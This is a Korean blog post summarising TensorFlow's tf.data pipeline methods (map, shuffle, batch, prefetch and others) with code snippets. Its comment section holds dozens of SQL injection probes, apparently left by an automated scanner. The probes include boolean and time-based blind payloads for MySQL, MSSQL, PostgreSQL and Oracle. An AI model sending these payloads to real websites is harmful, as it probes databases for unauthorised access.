BLOG
Python

데이터 파이프라인 tf.data 파헤치기


Nov. 7, 2022, 7:05 p.m.



얼마 전에 이미지 학습을 할 일이 있어서 이미지 학습 데이터를 준비하다가 tf.data API를 사용해 봤는데 너무 편리해서 이번 기회에 한번 정리를 해보려고 한다.

학습을 위해서는 먼저 학습할 파일을 메모리에 올려 적절한 전처리를 거친 다음에 신경망에 넣어주어야 한다. 신경망 계산은 GPU가 하겠지만 그 전에 전처리 과정은 CPU가 담당하게 되는데, 여기서 문제가 발생한다.

.

바로 CPU가 훈련용 배치 샘플을 만들기도 전에 GPU가 이전 배치 학습을 끝내게 되는 것이다. 그렇게 되면 CPU에 의해 GPU가 풀타임 학습을 진행하지 못하게 되면서 학습 속도의 저하가 생기게 된다.

.

이를 방지하기 위해서 훈련용 배치 데이터를 멀티 스레딩을 이용해서 빠르게 준비할 필요가 있다. 사실 파이썬 threading을 사용해도 되지만, 훨신 간편하고 최적화된 tf.Data API가 있어 이를 사용하는 것이 좋다.

이번 포스트는 tf.Data를 사용하면서 알게된 정보들 정리용으로 작성하는 포스트이다.


1. 데이터셋 생성하기


기본적으로 데이터셋을 만들면 tf.data.Dataset 객체가 만들어진다. 그리고 tf.data.Dataset의 여러 메서드를 이용해 데이터셋 객체를 만들 수 있다. 각 메서드를 소개해보겠다.

1. tf.data.Dataset.list_files()

dataset = tf.data.Dataset.list_files("/path/to/dataset/*.png')

이것은 어느 디렉토리 경로를 넣어주면 해당 조건에 맞는 파일의 리스트를 받아와 데이터셋을 만든다. 여기서 중요한 점은 경로만 받아오는거고 실제 이미지 파일을 사용하려면 이미지를 불러오는 매핑 함수를 따로 만들어야 한다.

2. tf.data.Dataset.sample_from_datasets()

balanced_train_ds = tf.data.Dataset.sample_from_datasets([train_a, train_b, train_c], [0.25, 0.25, 0.25])

다른 데이터셋 객체로부터 weight에 기반해서 샘플링을 해서 새로운 데이터 셋을 만든다. 이건 클래스 불균형이 있을 때 클래스 균형을 맞추기 위해서 사용할 수 도 있을 것 같다.

.


2. 데이터셋 매핑하기


데이터셋 객체를 만들었다면 이제 매핑하는 방법을 알아볼 차례이다.

1..map()

AUTOTUNE = tf.data.AUTOTUNE

def parse(filename):
    img = tf.io.decode_jpeg(tf.io.read_file(imgroot + img_dir))
    label = tf.strings.split(filename, sep=',')
    return img, label 혹은 return {'image':img, label}

dataset = datset.map(parse, AUTOTUNE)

만약 list_files로 데이터셋을 가져온다면 현재 데이터셋은 파일들의 경로만 포함되어 있다. 이것을 이미지 데이터로 바꾸려면 파일 경로를 받아 이미지와 레이블을 반환하는 매핑함수를 만들어 .map() 메서드를 사용해주면 된다. 여기서는 단지 이미지를 읽어들여 바로 반환했지만 사진을 자르거나 변형하는 등 다양한 전처리 작업을 포함시킬 수 있다.

여기서 두번째 인자로 병렬 연산을 할 지에 대한 여부를 숫자로 넣을 수 있다. 높은 숫자를 넣을 수록 다중 스레드로 처리를 하고 있는 것으로 알고 있는데 시스템 상황에 따라 적절한 숫자를 넣어주는 것이 좋다. 다만 tf.data.AUTOTUNE을 사용하면 알아서 적절한 숫자를 넣어주므로 이를 사용하는것을 강력추천한다.

3. 데이터셋 사용하기

데이터셋이 준비되었다면 이제 사용할 차례이다. 단순히 데이터셋 객체를 for 문 등에 사용하여 제너레이터로도 사용할 수 있지만, 배치 크기나 에포크 마다 순서를 뒤섞는등 다양한 변주를 줄 수 있다.

약간 pandas의 dataframe 다루는 것과 비슷한 느낌이 든다.

.

1. .shuffle()

train_ds = tf.data.Dataset.list_files(train_labelroot+'*.json').shuffle(1000, reshuffle_each_iteration=True)

데이터셋의 순서를 뒤섞는다. 첫번째 매개변수는 buffer_size이다. 한번 섞을 때마다 buffer 크기만큼만 꺼내서 섞는다. 너무 대용량일때 순서를 한번에 뒤섞는것은 컴퓨터 리소스를 너무 잡아먹기 때문. 그리고 reshuffle_each_iteration을 이용해서 매 에포크마다 새로 섞을 수 있다.

.

2. .repeat()

train_ds = train_ds.repeat(2)

데이터셋을 다 사용할 경우 끝나지 않고 반복되게 해준다. 매개변수로 몇 번 반복할지 정해줄 수 있으며 None을 넣어줄 경우 무한 반복하게 된다.

.

3. .batch()

train_ds = train_ds.batch(32)

데이터셋의 데이터 샘플들을 배치 단위로 묶어서 새로운 데이터셋을 만들어 준다.

.

4. .filter()

a = train_ds.filter(lambda x, y: y == 0)

부울형 리턴 함수를 통해 해당 조건을 만족하는 데이터만 가져오는 데이터셋을 반환할 수 있다.

.

5. .take()

skip = train_ds.take(100)

데이터셋에서 데이터를 앞에서부터 n개 뽑은 데이터셋을 반환한다.

.

6. skip()

skipped  = train_ds.skip(100)

take()와 다르게 .skip()은 앞에서부터 n개를 뽑은 나머지 데이터셋을 반환한다.

skip과 take는 훈련셋과 테스트셋을 나눌때 주로 사용한다.

.

7. prefetch()

prefetch는 데이터셋 준비 메서드를 병렬화 해서 다중 스레드로 처리하도록 만든다. 사실 이 기능을 쓰지 않으면 어차피 전처리 과정이 오래걸리는 것은 마찬가지인 것 같은데, prefetch 덕분에 멀티 스레딩으로 데이터 준비과정을 빠르게 만든다.

dataset = dataset.batch(32).prefetch(3)

넣어주는 매개변수는 버퍼 사이즈를 정한다. 클수록 prefetch를 통해 준비되는 데이터의 수가 많아진다.

4. 정리

train_ds = tf.data.Dataset.list_files(train_labelroot+'*.json').shuffle(1000, reshuffle_each_iteration=True).map(path_to_tensor)
train_ds = train_ds.map(pre_img, AUTOTUNE).batch(2).prefetch(10)

이런식으로 학습 데이터 식을 준비해볼 수 있겠다. 학습 데이터와 시스템 리소스, 그리고 모델에 따라서 적절한 파이프라인을 tf.data로 쉽게 구성할 수 있으니 공식페이지를 보면서 활용해 보면 좋을 듯 하다.

파이프라인 텐서플로 tensorflow


pHqghUme   

555

Jan. 22, 2025, 7:53 a.m.


pHqghUme   

555

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

-1 OR 2+34-34-1=0+0+0+1 --

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

-1 OR 2+724-724-1=0+0+0+1

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

-1' OR 2+222-222-1=0+0+0+1 --

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

-1' OR 2+738-738-1=0+0+0+1 or 'r3qi1VnX'='

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

-1" OR 2+164-164-1=0+0+0+1 --

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555*if(now()=sysdate(),sleep(15),0)

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555-1; waitfor delay '0:0:15' --

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555-1); waitfor delay '0:0:15' --

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555-1 waitfor delay '0:0:15' --

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555UGqL3kIX'; waitfor delay '0:0:15' --

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555-1 OR 938=(SELECT 938 FROM PG_SLEEP(15))--

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555-1) OR 836=(SELECT 836 FROM PG_SLEEP(15))--

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555-1)) OR 692=(SELECT 692 FROM PG_SLEEP(15))--

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555eWLe1zgS' OR 329=(SELECT 329 FROM PG_SLEEP(15))--

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555zVe4HEp2') OR 648=(SELECT 648 FROM PG_SLEEP(15))--

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555CphsJenU')) OR 282=(SELECT 282 FROM PG_SLEEP(15))--

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555'"

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555����%2527%2522\'\"

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

@@o7Pep

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555

Jan. 22, 2025, 7:54 a.m.


pHqghUme   

555

Jan. 22, 2025, 7:54 a.m.



Search